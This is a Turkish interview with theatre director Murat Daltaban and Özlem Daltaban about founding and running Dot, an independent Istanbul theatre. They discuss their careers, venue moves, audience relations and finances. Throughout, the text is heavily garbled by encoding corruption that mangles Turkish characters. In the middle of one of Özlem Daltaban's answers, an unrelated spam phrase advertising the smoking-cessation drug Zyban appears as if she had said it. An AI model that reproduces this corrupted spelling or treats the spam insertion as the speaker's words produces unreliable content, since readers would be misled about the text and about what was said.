PAi??nar Erol

TanAi??mlamalardan sAi??kAi??lan, bunalan bir adamAi??, bir Ai??erAi??eveye hapsetmeden nasAi??l anlatmalAi??? A?stelik, karAYAi??sAi??ndaki Ai??rneklerin azlAi??AYAi??ndan, yaptAi??AYAi?? AYeylerle, birine benzemekten Ai??ekinecek kadar Ai??zgA?nlA?AYA?n peAYindeyken. Sunulan modellerin taklidi olmamanAi??n kendi elinde olduAYunu keAYfettiAYi yer tiyatro. Biri gibi olmasAi?? gerekmiyor. Zaten ai???bA?tA?n hikayeler anlatAi??lmAi??AYtAi??r. BunlarAi??n sayAi??sAi?? da bellidir ama anlatAi??AY biAi??imi deAYiAYiktir.ai??? O, deAYiAYtirmeyi seviyor. BasmakalAi??p Ai??AYretileri kabul etmediAYinde, karAYAi??sAi??na bir uzam Ai??Ai??kAi??yor. OrasAi?? iAYte, baAYladAi??AYAi?? yer. Orada, zamanAi??n heyecanAi??ndan, AYimdinin Ai??arpAi??AYmasAi??ndan besleniyor. ai???Aysbergai??i??in gAi??rA?neni bAi??yle, altAi??ndaki cevheri anlatmak iAi??inse dilin baAYka dalga boylarAi??na ihtiyacAi?? var.

BaAYlarda sinemayAi?? istese de, aklAi??ndan geAi??en tiyatro yAi??netmenliAYi. BazAi?? AYeyleri, bir maskenin ardAi??ndan sAi??yleyebileceAYi bir alanAi?? olduAYu iAi??in tiyatro yapmaya karar veriyor. Fizik ve matematik bA?yA?lA?yor. Hayata bakAi??AYAi??nda bir altyapAi?? oluAYturuyor. O duygusal zekasAi?? iAYte, yaAYamAi??n sAi??radanlAi??AYAi??nAi??, sanatAi??n bA?yA?sA?ne baAYlAi??yor. Tiyatroyu Ai??ok seviyor. Bunu Ai??lAi??A?lendiremem, annenizi ne kadar sevdiAYinizi dA?AYA?nA?n anlamak iAi??in. Tiyatro adAi??na yapAi??lan iyi AYeylerin neredeyse yarAi??sAi?? onun baAYAi??nAi??n altAi??ndan Ai??Ai??kmAi??AYtAi??r deniyor. Ai??ocuAYunun gA?zel bA?yA?mesine tanAi??klAi??k eden bir babanAi??n maAYrur bakAi??AYlarAi?? var. BaAYarAi??yAi?? pay ediyor. Bir anlAi??AYAi??na Dotai??i??un hiAi?? var olmadAi??AYAi??nAi?? dA?AYA?nA?n. Farz edin ki Murat Daltaban, Azehir TiyatrolarAi??ai??i??nda hA?lA? nefesini tutmaya Ai??alAi??AYAi??yor. O zaman diAYer kA?Ai??A?k, baAYAi??msAi??z tiyatrolarAi??n da olmayacaAYAi?? ihtimali sizin de aklAi??nAi??za geliyor mu? Ai??htiyaAi??tan doAYdu Dot! KA?f kokmayan oyunlara duyulan Ai??zlemden, yeniden yana aAYzAi??nAi?? aAi??mayanlara inattan, gerAi??ekliAYi yumuAYatmayan tavAi??rdan, A?retkenliAYin heyecanAi??ndan, yA?rekli olmanAi??n Ai??dA?nsA?zlA?AYA?nden, olmayanAi??n gerekliliAYinden, gA?ncelin arayAi??AYAi??ndan, tutkunun yol alAi??AYAi??ndan…

Tek bir yazAi??ya sAi??AYmayacak kadar Ai??ok oyunlarAi?? var aklAi??mAi??zAi??n sinemasAi??ndan geAi??en. DAi??ne dAi??ne sahnelenen oyunlarAi??n bAi??kkAi??nlAi??AYAi??na inat; bugA?nA?n sAi??zA?, karAYAi??lAi??AYAi??nAi?? buluyor nicedir bekleyen seyirci kalplerimizde. Yine de ai???bunca zamandAi??r nerelerdeydinai??? sorusu sorulmuyor. Onlarsa ceplerimize soru kancalarAi??nAi?? doldurup eve yolluyor bizi. TA?m duyargalarAi??mAi??zAi?? uyandAi??rAi??yor, provake ediyor. RahatsAi??z etmekten Ai??ekinmek mi? Olur mu hiAi??! ElektrogitarAi??n Ai??Ai??kardAi??AYAi?? o ai???bozulmuAYai??? ses, beyninin kAi??vrAi??mlarAi??ndan yakalayAi??p zAi??platAi??r ya insanAi??, iAYte o, onun istediAYi ton! MA?ziAYi Ai??yle onunai??i?? ai???Agresif teknikai???, ai???sAi??cak mekA?nai??? onlarAi??n jargonu. Her oyundan, hiAi?? olmazsa bir cA?mleyi bedenimize geAi??irebilelim diye oynuyorlar, Ai??AYAi??klAi?? olabilelim diye. Azimdi bunlar az AYey mi?

Ai??zlem Daltaban oyuncu deAYil, ama artAi??k tam teAYekkA?llA? tiyatro insanAi??. Ekibin aldAi??AYAi?? her alkAi??AYta o da selama duruyor. Dotai??i??u ayakta tutmanAi??n bA?yA?cA?sA? o. Emek ve Ai??Ai??zA?m sAi??zcA?klerini anlamlandAi??ran biri. Dotai??i??un her A?yesi bir pAi??rAi??ltAi??lAi?? renk, bir araya gelince gAi??kkuAYaAYAi??nAi?? boyuyorlar. Birlikte Ai??yle gA?zeller ki…Ai??

GA?zel AYeyler izleme hakkAi??mAi??zAi?? bize hatAi??rlattAi??klarAi?? ve geri verdikleri iAi??in minnetli bir teAYekkA?rA?m var onlara. Elden ele geAi??en Ai??iAi??eklerin kokusu biter mi?Onlardan gelen gA?zellik, kaAi?? hayatAi??n iAi??inde bA?yA?yor AYimdi…

ODTA? Maden MA?hendisliAYi’ni altAi?? yAi??l okuyup, A?Ai??A?ncA? sAi??nAi??fta bAi??rakAi??yorsunuz. Arada Ai??ktisat ve Jeoloji MA?hendisliAYiai??i??ni de kazanAi??yorsunuz ama sonra Ankara A?niversitesiAi??Dil ve Tarih-CoAYrafya FakA?ltesi Tiyatro BAi??lA?mA? Oyunculuk Ana Sanat DalAi??’ndan 1992 yAi??lAi??nda mezun oluyorsunuz.Ai??Tiyatro yapmanAi??z ergenlik hezeyanAi??nAi??zla ilgili. Oyunculuk yapacak bir karakteriniz yokken sahneye Ai??Ai??kmak sizin iAi??in sAi??nav gibi. ai???Kendimle savaAYarak bu iAYi yaptAi??m. Tiyatrocu olmak deAYil; olmak ya da olmamak noktasAi??ndaydAi??mai??? diyorsunuz. ai???Olmayacak biliyorum ama yine de olmadAi??AYAi??nAi?? gAi??rmek istiyorumai??? diyerek sAi??navda Hamlet’in ai???olmak ya da olmamakai??? tiradAi??nAi?? oynamanAi??z bugA?n bakAi??nca ne kadar ironik!
Murat Daltaban: SAi??yleyecek bir AYey yok aslAi??nda. Ai??ok detaylAi?? anlattAi??nAi??z ve tam da bu anlattAi??AYAi??nAi??z AYekilde oldu. Bizim zamanAi??mAi??zda A?niversite sAi??navAi??nda, en yA?ksek bAi??lA?mden, daha dA?AYA?k puanlara doAYru sAi??ralama yapAi??lAi??yordu. Ben de ODTA? istiyordum ve ODTA? Maden MA?hendisliAYiai??i??ni kazandAi??m. Ai??ok gA?zeldir aslAi??nda bAi??lA?m, altAi?? senem ODTA?’de geAi??ti sonra bAi??raktAi??m, tiyatroya geAi??tim ama o yAi??llarAi??mAi?? hiAi??bir zaman kayAi??p gibi gAi??rmedim. ODTA?ai??i??den mezun olmadan, A?Ai??A?ncA? sAi??nAi??fta ayrAi??ldAi??m ama ODTA?’lA? olmak fikrini her zaman Ai??ok Ai??nemsedim. ODTA?ai??i??nA?n iAi??inden geAi??mek bile size hayatla ilgili Ai??ok Ai??nemli tecrA?beler, bilgiler kazandAi??rAi??r. Sonra Hacettepe Ai??ktisatai??i??Ai?? kazandAi??m, gitmedim, Jeoloji MA?hendisliAYiai??i??ni kazandAi??m oraya da kaydAi??mAi?? yaptAi??rmadAi??m. O sAi??rada Ankara A?niversitesi Tiyatro BAi??lA?mA?ai??i??nA? kazandAi??m. Tiyatroyu, ergenlik problemlerinden Ai??Ai??kmaya Ai??alAi??AYAi??rken, kendimi ifade edecek bir alan bulmanAi??n mutluluAYuyla kazandAi??m ve Ai??ok Ai??ok Ai??ok sevdim Dil-Tarih Tiyatroai??i??yu, oradaki Ai??AYretmenlerimi, Sevda (Azener) Hocamai??i??Ai??. Ai??ok gA?zel vakit geAi??irdim, Ai??ok AYey Ai??AYrendim. Okul bittiAYinde Ai??stanbulai??i??a Ai??Azehir Tiyatrosuai??i??na geldim.

Gelmeden Ankara Devlet Tiyatrosuai??i??nda da oynadAi??AYAi??nAi??z oyunlar var. ilk 1989ai??i??da ai???Bir SAi??rAi??a KAi??AYk MasalAi??ai??? var. Sonra ai???TroyalAi?? KadAi??nlarai???, ai???Fadik KAi??zai???, ai???EAYek ArAi??larAi??ai???, ai???KanlAi?? DA?AYA?nai??? BabayiAYitai???, ai???Emrem Yunusai???ai??i??
Murat Daltaban: Onlar okul zamanAi??, sahneyi anlamak iAi??in figA?rasyona Ai??Ai??ktAi??AYAi??m zamanlardAi??. Sahneyi, kulisi, kurumsal bir tiyatronun parAi??alarAi??nAi?? orada gAi??rmeye baAYladAi??m. Azehir Tiyatrosuai??i??na geliAYim, Sevda Azener’in desteAYiyle olmuAYtur. ai???Devlet Tiyatrosu’nda seni A?zerler, sAi??yleyeyim de Gencayai??i??a (GA?rA?n) Azehir Tiyatrosuai??i??na geAi??ai??? dedi. Ankara’dan Ai??stanbul’a gelmek baAYlangAi??Ai??ta Ai??ok zordu. Sevda Hocaai??i??nAi??n bana duyduAYu inanAi??, sevgi ve onun korumacAi?? tavrAi?? benim Ai??stanbulai??i??daki profesyonel tiyatro maceramAi?? baAYlattAi??. Kurumda geAi??irdiAYim on A?Ai?? senenin tamamAi??nda Ai??ok iyi roller oynadAi??m.

Evet, ilk akla gelenler, ai???Bir Ata KrallAi??AYAi??mai???, ai???Dumrul ile Azrailai???,Ai?? ai???Othelloai???, ai???Medeaai???ai??i??
Murat Daltaban: Kariyerimin Ai??nemli bir bAi??lA?mA?nde oradaydAi??m. Azehir Tiyatrosuai??i??nda Ai??BaAYar Sabuncu ile tanAi??AYtAi??m. MuhteAYem bir yAi??netmen, kAi??ymetli bir tiyaro insanAi??. HA?lA? da en Ai??ok etkilendiAYim yAi??netmenlerdendir. Sonra SavaAY DinAi??el ile orada tanAi??AYtAi??m, birlikte oynadAi??m, Azehir Tiyatrosuai??i??nda ilk oyunum onunlaydAi??. Onu Ai??ok sevmemdeki en bA?yA?k sebep yumuAYacAi??k ve bilge halidir. Tomris Ai??ncer ile oynadAi??AYAi??m ikinci oyunum da baAYka muhteAYemlikteydi. Tomris abla ile Ai??ok gA?zel gA?nler geAi??irdim, ondan da Ai??ok AYey Ai??AYrendim. TA?m bu gA?zel insanlara raAYmen Ai??ok kAi??tA? zamanlar, Ai??ok aAYAi??r dAi??nemler de geAi??irdim Azehir Tiyatrosuai??i??nda. O aAYAi??r dAi??nemlerin sonunda gerAi??ekten nefret ettiAYim bir yer haline geldi kurum ve neredeyse tiyatroyu bAi??rakma noktasAi??ndayken, istifa ettim. Tiyatrodan deAYildi bAi??kkAi??nlAi??AYAi??m, kurumsal Ai??ekiAYmelerden, kurumsal yAi??netim problemlerinden dolayAi?? istifa ettim oradanai??i?? Sonra Ai??yle bir AYey yakaladAi??m ki hayatta, Ai??yle bir AYeye sahip oldum ki, onu kimse benden alamaz! Tiyatro benim iAi??in Ai??yle bir AYey. Oynamak, oynamamak hiAi?? Ai??nemli deAYil, Ai??yle hAi??rslarAi??m olmadAi??. Herkes iyi rol oynamak ister, ben de elbetteai??i?? Ama hiAi??bir zaman asAi??l hedef olarak merkeze kendi oyunculuAYumu Ai??koymadAi??m. Hak ettiAYim yeri yaAYayayAi??m isteAYiyle Ai??ok Ai??alAi??AYtAi??m, tiyatroyu her AYeyden Ai??ok Ai??nemsedim ve hep Ai??ok sevdim. Sonra, o sAi??kAi??ntAi??lAi?? dAi??nemde Ai??zlemai??i??le sohbet ederken birlikte bir tiyatro kurmaya karar verdik. SA?ha’yAi?? (Bilal) da bizimle olmaya ikna ettik. SA?ha arkadaAYAi??mAi??zdAi??, ortaAYAi??mAi??z oldu ve ilk gA?nden beri hep birlikte hareket ettik. Dot Ai??ncesinde Kumpanyaai??i??daAi?? Kerem KurdoAYlu ve Naz Erayda ile Ai??alAi??AYtAi??m. 5. Sokak Tiyatrosuai??i??nda Mustafa AvkAi??ran ile Ai??alAi??AYtAi??m. Hepsinden Ai??ok AYey Ai??AYrendim.

2005 yAi??lAi??ndaAi??Ai??zlem DaltabanAi??ve SA?ha Bilal’le birlikteAi??Dot‘u kurdunuz ve o dAi??nemAi??Britanya‘da doAYmuAY olanAi??in-yer-faceAi??akAi??mAi?? bolca telaffuz edildi. Ai??nternet adresiniz Go-dot. Ai??sminizin o rastgeleliAYi, anlamlAi?? bir hareketin Ai??ncA?sA? oldu ve peAYinizden bir cesaret, birAi??ok kA?Ai??A?k tiyatro var oldu.
Murat Daltaban: Okulda bir sA?rA? AYeyi Ai??AYreniyorsunuz, okul ufkunuzu aAi??Ai??yor. SonrasAi??nda Azehir Tiyatrosu, bildiklerimi sahne A?stA?nde uygulamaya baAYladAi??AYAi??m yer oldu. Ama asAi??l Azehir Tiyatrosu tecrA?bemin ardAi??ndan biriktirdiklerim, bilgim ve yaratAi??cAi?? tarafAi??m bir araya geldi. ODTA?ai??i??de biriktirdiklerim de bana hayata baAYka bir yerden bakmayAi??, hayata ya da sanata laboratuvar gibi yaklaAYmayAi??, analitik Ai??Ai??zA?mleri Ai??AYretmiAYti.

Ve bilimin de aslAi??nda sanatAi??n iAi??inde olduAYunu Ai??AYretti size.
Murat Daltaban: Evet, hepsini toparladAi??AYAi??mda Dot oluAYtu diyebilirim. Ai??zlem’in ve SA?ha’nAi??n kendi alanlarAi??ndan getirdikleri bilgi ve tecrA?beleriyle benim tiyatro ile ilgili biriktirdiklerim bir araya geldiAYinde Dot birdenbire ortaya Ai??Ai??ktAi?? ve kuruluAYundan bir sene sonra, sanki on senedir varmAi??AY gibi gA?Ai??lA? bir kurum olarak gAi??rA?ldA?. Tiyatronun pek gAi??rA?nA?r olmadAi??AYAi?? bir dAi??nemde, kimsenin mekA?n aAi??maya cesaret edemediAYi, tiyatronun neredeyse prestij kaybettiAYinin dA?AYA?nA?ldA?AYA?, tiyatrocu olmanAi??n alaycAi?? bir gA?lA?msemeyle karAYAi??landAi??AYAi?? zor bir dAi??nemde Dot parlak ve yeni bir hareket olarak ortaya Ai??Ai??ktAi??. Ve bu hem tiyatro seyircisini, hem de basAi??nAi?? ve kA?ltA?r yayAi??nlarAi??nAi?? Ai??ok heyecanlandAi??rdAi??. O dAi??nemde gazetelerin arasAi??ndan Ai??zellikle Radikal, hem ana gazetede hem de eklerinde Ai??ok ciddi tiyatro yazAi??larAi?? basardAi??. Azehirdeki kA?ltA?r sanat hayatAi??nda A?reten ekiplerde ve haber yapan ekiplerde, birbirini tamamlayan ve yA?kselen bir enerji vardAi??. Biz de bu akAi??AYAi??n iAi??ine dahil olduk. Sadece Radikal deAYil elbette, Cumhuriyet, HA?rriyet, Milliyet ve birAi??ok aylAi??k dergide ve Tiyatro Dergisiai??i??nde Ai??ok sayAi??da haberimiz, rAi??portajAi??mAi??z yayAi??nlandAi??. Tansiyon yA?ksekti kAi??sacasAi??ai??i??

Dotai??i??un kuruluAY amacAi??nda var ai???tansiyonlu tiyatroai??i?? tanAi??mAi??. DA?AYA?nme, sorgulama dinamiAYini Ai??alAi??AYtAi??ranai??i??
Murat Daltaban: Oyun seAi??imi, reji ve mekA?n tercihleri olarak Ai??ok agresif girmiAYtik zaten. ai???Frozen-DonmuAYai??? ile baAYlamAi??AYtAi??k. MekA?nAi??n inAYaatAi?? provalarla iAi?? iAi??e altAi?? ay sA?rmA?AYtA?. Ai??lk oyunumuz ai???Frozenai???da A?Ai?? karakter vardAi??, A?Ai?? oyuncu yan yana durup hikayelerini direkt seyirciye anlatAi??yordu. Son derece yalAi??n, beklenmedik AYekilde minimalist rejisi olan bir oyunla yapmAi??AYtAi??k tiyatronun aAi??Ai??lAi??AYAi??nAi??. Seyircinin alAi??AYkanlAi??klarAi??nAi??n dAi??AYAi??nda bir durumdu bu, etkileniyorlardAi??. Oyunun metninden ve anlatAi??lAi??AY biAi??iminden Ai??ok etkileniyorlardAi??. Genelde bunu severiz, seyirciyi heyecanlandAi??rmak, AYaAYAi??rtmak, zihnini aAi??mak, kimyasAi??nAi?? harekete geAi??irmek isteriz. Seyircinin oyundan Ai??Ai??ktAi??ktan sonra A?zerine dA?AYA?nmesini ve cebinde oyunu taAYAi??masAi??nAi?? isteriz. Seyirci yAi??llar boyunca, bizimle birlikte bu heyecanAi?? sA?rdA?rdA?. Dot’un hA?lA? baAYarAi??lAi?? olmasAi??nAi??n sebebi hep yeni bir heyecanla yeni oyunlar sahneliyor olmasAi?? ve bunu hep birlikte yaAYAi??yor olmamAi??z.
Ai??zlem Daltaban: Evet doAYru, biz aslAi??nda sevdiAYimiz tiyatroyu yapmak ve bizi heyecanlandAi??ran metinleri oynamak iAi??in Dotai??i??u aAi??tAi??k. Murat sevdiAYi tiyatro oyunlarAi??nAi?? sahnelemek ve seyircilerle paylaAYmak isteyen bir sanat yAi??netmeni. Yani biz baAYlangAi??Ai??tan beri kendi fikirlerimizden yola Ai??Ai??karak, eksik bulduAYumuz tA?m detaylarAi??n tamamlandAi??AYAi?? bir tiyatro yapAi??sAi?? oluAYturmaya Ai??alAi??AYtAi??k.

Seyircinin beAYenisini referans almayAi??p giAYe kaygAi??sAi??yla hareket etmediAYiniz iAi??in size baAYAi??msAi??z tiyatro deniyor. Ve o eller taAYAi??n altAi??ndan Ai??Ai??kamAi??yor hiAi??. Seyirciyle iliAYkisi farklAi??, ona gAi??rev veriyor, oyuna katAi??yor, kAi??AYkAi??rtAi??yor. ai???Fight Night-DAi??vA?AY Gecesiai???nde Ai??rneAYin seyirci olmazsa oyun ilerlemiyor. Ama o demokrasi simA?lasyonu da aslAi??nda seAi??imleri bizim yapmadAi??AYAi??mAi??zAi?? acAi?? acAi?? anlatAi??yor. ai???Pornografiai???de, oyunun etkisi seyrettikten bir sA?re sonra ortaya Ai??Ai??kAi??yor ve zamanla artAi??yor ve seyirciyi rahat bAi??rakmAi??yor. ai???Hassasai???ta seyirci desteAYi Ai??ok Ai??nemliai??i?? Ai??ncesinde Azehir TiyatrolarAi??ai??i??nda bA?yA?k salonlara, hatta aAi??Ai??khavada dAi??rt bin kiAYiye oyunlar oynarken Ai??lAi??ek kA?Ai??A?ldA? belki ama temas arttAi??.
Murat Daltaban: Evet, sA?reAi?? iAi??inde AYunu Ai??AYrendim: Mesele salonun bA?yA?klA?AYA? ya da seyirci sayAi??sAi?? deAYilmiAY; mesele, seyirciye dokunmakmAi??AY. KA?Ai??A?lmenin Ai??ok ekstra avantajlarAi?? var biAi??im olarak o ayrAi??ai??i?? Ama mesela bir gecede, bizim normal rakamAi??mAi??zAi??n iki katAi?? sayAi??da seyirciye Ai??ai???Festen-Kutlamaai???yAi?? yaptAi??k Koleksiyonai??i??da. OrasAi??, aAYaAYAi?? yukarAi?? orta Ai??lAi??ekli bir tiyatro mekA?nAi??ydAi?? diyebiliriz. Ai??O mekA?nda da seyirciye dokunmanAi??n yAi??ntemlerini bulduk. Oyun dAi??AYarAi??da baAYlAi??yordu, sonra seyirciyi bahAi??eden Ai??adAi??rAi??n iAi??ine, seyir alanAi??na alAi??yorduk. Seyirci oyun devam ederken sessizce sandalyelerine oturuyordu. Ai??nemli olan, senin tiyatrodaki seyirci ile iliAYki kurma biAi??imin, biz bu iliAYkiyi hep Ai??ok Ai??nemsedik. Seyirciyi oyunun iAi??ine dahil etmek gibi kliAYe bir durumdan sAi??z etmiyorum, seyirciye ai???AYimdi burada birlikteyizai???i hissettirmekten, onlarla gAi??z temasAi??nda olmaktan, onlara dokunmaktan bahsediyorum. Seyircinin nefesini hissetmek, seyircinin oyuncu ile iliAYkisini, seyircinin birbiriyle nefes alAi??p verme iliAYkisini Ai??nemsemek gerekiyor. Yeni bir AYey icat etmedik belki ama Ai??ok yeni bir AYeyi birlikte yaAYadAi??k, yaAYattAi??k.

Ai??zlem HanAi??m, sizin iAi??in Dotai??i??un bel kemiAYi deniliyor. Sadece tiyatro yAi??netmenin zorluAYundan bahsetmiyorum; seyircisini de dA?AYA?nen biri olmanAi??zdan bahsediyorum. Mesela, yaAYmurlu, karlAi?? gA?nlerde Ai??adAi??rda, yukarAi??da bahsi geAi??en ai???Festenai??? oynanAi??rken ai???acaba ses rahatsAi??z eder mi, sAi??zleri bastAi??rAi??r mAi?? diyeai??? Ai??ok kaygAi??lanAi??rmAi??AYsAi??nAi??z.
Ai??zlem Daltaban: Evet ben her bir oyunu baAYlatmak ve bitirmek konusunda epeyce titiz ve endiAYeli biriyimai??i?? Koleksiyon Ai??adAi??rAi??ndaki ai???Kutlama-Festenai??? oyunuyla ilgili yAi??lbaAYAi??ndan bir gA?n Ai??nce komik bir anAi??mAi??z var. Ai??ok karlAi?? bir gA?ndA?, mekA?nAi??mAi??z bahAi??eye kurulmuAY oldukAi??a bA?yA?k bir Ai??adAi??rdAi??. Ai??adAi??rAi??n tavanAi?? ve duvarlarAi?? ses iAi??in Ai??zel kumaAYlarla kaplAi??ydAi??… O gA?n, Ai??yle bir kar fAi??rtAi??nasAi?? vardAi?? ki, bA?tA?n o kumaAYlar rA?zgA?rdan dalgalanAi??yor, mA?thiAY ses Ai??Ai??karAi??yordu. Biz gA?ndA?z saatlerinde gidiyorduk mekA?na oyun gA?nleri, o gA?n uzun uzun oturdum mekA?nda kendi baAYAi??ma, sesleri dinledimai??i??Ben o akAYam salona insanlarAi?? oturtsam, seyirci hem oyuncularAi??n sesini duyamayacak hem de huzursuz olacak diye dA?AYA?ndA?m. Sonra Murat’Ai?? aradAi??m, dedim ki: ai???Azu an burada kAi??yamet kopuyor. Bu oyun, bu gece oynanamaz.ai??? Sonra seyircilerimizi aradAi??k, durumu anlattAi??k, Ai??oAYu bize teAYekkA?r etti. MA?thiAY tatlAi?? bir seyircimiz var. Bazen, oyuncu rahatsAi??zlAi??AYAi?? olduAYunda mecburen iptallerimiz oluyor, canAi?? sAi??kAi??lAi??yor seyircinin biliyorum bu durumlarda, planAi??nAi?? yapmAi??AY belki A?Ai?? hafta Ai??nceden yerini almAi??AYai??i?? Ama o akAYam memnun oldular, hava koAYullarAi??ndan dolayAi??, hatta hoAYlarAi??na gitti aAi??Ai??klamamAi??zai??i?? Bunlar benim titizliklerim ama Murat’a sormadan hiAi??bir karar almAi??yorum elbette. Son sAi??z onun.

Mobil Hareketleri var Dotai??i??un. Yedi mekA?n deAYiAYtirdi. Her mekA?nAi??n da proje oyunu oldu. GAi??Ai??ebe tiyatro olmak, sizin deyiminizle ai???AYehir gAi??Ai??ebeliAYiai??? hareket kabiliyetini ve Ai??Ai??zA?me odaklAi?? olmayAi?? saAYladAi??. SAi??rasAi??yla AYAi??yle gAi??Ai??tA?nA?z:Ai??1 DOT (MAi??sAi??r ApartmanAi??, Ana MekA?n),Ai??2 DotBilsarda (Bilsar BinasAi??, Mobil Proje),Ai??3 DotKoleksiyonda (Koleksiyon BinasAi??, Mobil Proje),Ai??4 DotMarsta (MaAi??ka G-Mall, KA?Ai??A?k MekA?n),Ai??5 DOT (MaAi??ka G-Mall, Ana MekA?n),Ai??6 DotKanyonda (Kanyon, Ana MekA?n)
Ai??zlem Daltaban: Zyban over the counter canada DotKanyonda son mekA?nAi??mAi??z ve bir aksilik olmazsa 5+5 yAi??l boyunca buradayAi??z. MAi??sAi??r ApartmanAi??, G-Mall A?st kattaki bA?yA?k salon ve burasAi?? (Dotkanyonda) ana ve bA?yA?k mekA?nlarAi??mAi??z. DotBilsarda ve DotKoleksiyonda ise mobil hareketlerdi, bunlar Ai??zel proje iAi??in dAi??nA?AYtA?rA?lmA?AY mekA?nlardAi??r. DotMarsta ise kA?Ai??A?k bir sA?rekli mekA?n olarak planlanmAi??AYtAi??. DotBilsarda mekA?nAi??, Mark Ravenhillai??i??in ai???Vur/YaAYmala/Yenidenai??? projesi iAi??in hazAi??rlandAi??. Bilsar binasAi??nAi??n alt katAi??ndaki brA?t beton boAY alan, kAi??sa oyunlar projemizin konseptine Ai??ok uygundu. MekA?nAi??n projeye uygunluAYu bu kararAi?? almamAi??zda bA?yA?k etken oldu. Koleksiyonai??i??un bahAi??esindeki bA?yA?k Ai??adAi??r da yine ai???Kutlama-Festenai??? oyunu iAi??in tam aradAi??AYAi??mAi??z mekA?ndAi??. Bu mobil hareketler, hep Murat’Ai??n mekA?n projeleridir. Ai??stanbulai??i??da baAYAi??msAi??z ve Ai??zel bir tiyatro olarak, yani Ai??deneksiz, fonsuzai??i?? Ana mekA?nAi??mAi??zda repertuvar oyunlarAi??mAi??z devam ederken salonumuzu bA?tA?n bir sezon sadece kAi??sa oyunlar serisine ayAi??rmak Ai??ok riskli bir karar olurdu, o nedenle kAi??sa oyunlar serisini farklAi?? bir mekA?nda yA?rA?tmek istedik. Murat ve SA?ha ile birlikte bu konu A?zerinde Ai??ok dA?AYA?ndA?k, KAi??sa oyunlar serisini yapmayAi?? Ai??ok Ai??nemli buluyor, projeden vazgeAi??mek istemiyorduk. SonuAi??ta mekA?n sayAi??sAi??nAi?? arttAi??rmaya karar verdik. YAi??llar iAi??inde bu mekA?n projeleriyle, mekA?n sayAi??sAi??nAi?? arttAi??rarak seyirci sayAi??mAi??zAi?? arttAi??rdAi??k. BazAi?? gA?nler saat19.00ai??i??da Dotbilsardaai??i??da, saat 21.00ai??i??de MAi??sAi??r ApartmanAi??ai??i??nda oyun baAYlattAi??k, bazAi?? oyuncularAi??mAi??z her iki oyunda da oynuyor, birinden Ai??Ai??kAi??p diAYerine yetiAYiyordu.ai??i?? Sonra aynAi?? ritmi MaAi??ka G-Mallai??i??da yakaladAi??k. Haftada dAi??rt akAYam, A?st bA?yA?k salon ve alt kA?Ai??A?k salonda iki oyun birden baAYlattAi??k. Ai??stanbulai??i??da bizim gibi farklAi?? iAYler A?reten mekA?nlarAi??n bir akAYamda A?Ai?? yA?z, beAY yA?z seyirciye oynamasAi?? kolay olmayabilir. Biz bu mobil mekA?n projelerle, iki farklAi?? mekA?nda farklAi?? oyunlar oynayarak seyirci sayAi??mAi??zAi?? arttAi??rdAi??k.
Murat Daltaban: Yine de kA?r edemedik amaai??i??
Ai??zlem Daltaban: O dAi??nem G-Mallai??i??da kafemiz vardAi??. Murat’Ai??n deyimiyle burasAi?? ai???tiyatronun mutfaAYAi??ai??i?? olur diye dA?AYA?ndA?k, Ai??ok keyifli A?Ai?? yAi??lAi??mAi??z geAi??ti o kafede. FarklAi?? bir iAYletme olmasAi??na raAYmen, inanAi??n olmuyor da olmuyor. Tiyatronun her mekA?n deAYiAYiminde inAYaat yatAi??rAi??mAi?? ve yeni ses, Ai??AYAi??k, yA?kselti, sandalye satAi??n alAi??mlarAi?? yaptAi??k. BA?tA?n bunlar sA?rekli kredi kullanmak anlamAi??na geliyor. Uzun yAi??llardAi??r kredi borAi??larAi??mAi??zAi?? Ai??dA?yoruz. Bir yandan da sA?rekli yeni oyun prodA?ksiyonlarAi?? yapAi??yoruz. OldukAi??a zor olduAYunu sAi??ylemeliyimai??i??

ai???Sanatta, devlet, Ai??zel sektAi??r ve kurum sacayaAYAi??n ayaklarAi??nAi?? oluAYtururai??? diyorsunuz ya. Bizde devlet hiAi?? yok, o benzetme politikasAi??nAi?? gA?dA?yor. Ya kendine benzeyene Ai??denek Ai??Ai??karAi??yor, ya da benzemeyeni benzetmeye Ai??alAi??AYAi??yor. Ai??zel sektAi??r Ai??ok az. TA?m bunlar arasAi??nda oluAYturduAYunuz mekA?nsal iAYbirlikleri modeli sizi ayakta tutuyor. Bu da co-prodA?ksiyonlarla oluyor. Kendinize mA?dahale ettirmeden bunu saAYlamak Ai??nemli. HiAi?? asimile olmadan iAi??inde yer almanAi??z kAi??ymetli.
Ai??zlem Daltaban: YaAYadAi??AYAi??mAi??z A?lkenin koAYullarAi??na karAYAi??n geliAYtirdiAYimiz bir modeldi buai??i?? Ben birAi??ok farklAi?? yerde anlattAi??m bu modeli, hep Ai??ok ilgi gAi??rdA?. Ai??AYbirliAYi yaptAi??AYAi??mAi??z her mobil mekA?n projesinde, ev sahiplerimiz Dotai??i??un baAYAi??msAi??zlAi??k halini makbul ve kAi??ymetli buldular. Biz de baAYka tA?rlA?sA?nA? kabul edemezdik, etmezdik. YaptAi??AYAi??mAi??z oyunlara, biAi??imine, iAi??eriAYine, ismine karAi??AYAi??lmasAi??na izin vermeyiz. Bu anlaAYmalarAi??n baAYlangAi??Ai?? noktasAi?? bu konuda hemfikir olmak. Bu nedenlerle, zaman zaman teklifleri geri Ai??evirmek zorunda kaldAi??k, kalAi??yoruzai??i?? Ai??nsan farklAi?? teklifleri anAi??nda seziyor, sohbet esnasAi??nda daha ilk cA?mlede anlAi??yorsun, ai???yokai??i?? diyorsun, ai???olmasAi??nai??i?? o zaman.

MA?zik ve Ai??izgi roman hayatAi??nAi??zda Ai??ok yer kaplAi??yor.
Murat Daltaban: HayatAi??m boyunca mA?zikle hep Ai??ok yakAi??ndAi??m. AmatAi??rce ilgilendiAYim ve Ai??ok beslendiAYim bir alan mA?zik. Odamda mA?zik aletlerim ve kitaplarAi??mla yaAYAi??yorum, baAYka da bir AYeyim yok. BA?tA?n hayatAi??m bunlar diyebilirim, ailem, tiyatrom, kitaplarAi??m ve mA?zik.

Ai??ocukluAYunuzdan beri AYarkAi?? sAi??ylA?yorsunuz. ODTA?’de okurken bir yandan konservatuvar Azan BAi??lA?mA?’ne gidiyorsunuz. Bir dAi??nem kulA?plerde grubunuzlaAi??mA?zik yapAi??yorsunuz. Bir de iyi gitar Ai??alma sevdanAi??z var.
Murat Daltaban: Evet onlarAi?? da yaptAi??m ama sonrasAi??nda benim iAi??in baAYka bir yere taAYAi??ndAi?? mA?zik. ArtAi??k mA?ziAYin baAYka tA?rlA? bir bilgi ile yeri var hayatAi??mda. PopA?ler mA?zik gibi deAYil; daha hayatAi??n iAi??inde bir AYey.

